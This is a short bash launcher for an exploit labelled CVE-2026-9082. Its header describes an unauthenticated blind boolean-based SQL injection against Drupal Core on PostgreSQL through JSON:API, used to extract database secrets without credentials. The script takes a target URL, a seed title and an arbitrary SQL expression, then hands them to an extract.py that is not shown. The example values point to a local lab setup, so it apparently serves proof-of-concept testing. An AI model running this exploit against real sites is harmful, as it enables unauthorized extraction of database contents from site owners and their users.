#!/usr/bin/env bash
# CVE-2026-9082 — unauthenticated SQLi in Drupal Core (PostgreSQL) via JSON:API.
# Recovers a DB secret through blind boolean-based extraction over the public HTTP
# surface only. No DB credentials, no Drupal session.
#
# Usage: run.sh <base_url> <base_title> <sql_expression>
#   base_url       e.g. http://127.0.0.1:8888
#   base_title     a title that matches the seed article (makes base IN TRUE)
#   sql_expression scalar SQL whose value is extracted, e.g.
#                  "SELECT secret FROM lab_secret WHERE id=1"
set -euo pipefail
BASE_URL="$1"
BASE_TITLE="$2"
SQL="$3"
exec python3 "$(dirname "$0")/extract.py" "$BASE_URL" "$BASE_TITLE" "$SQL"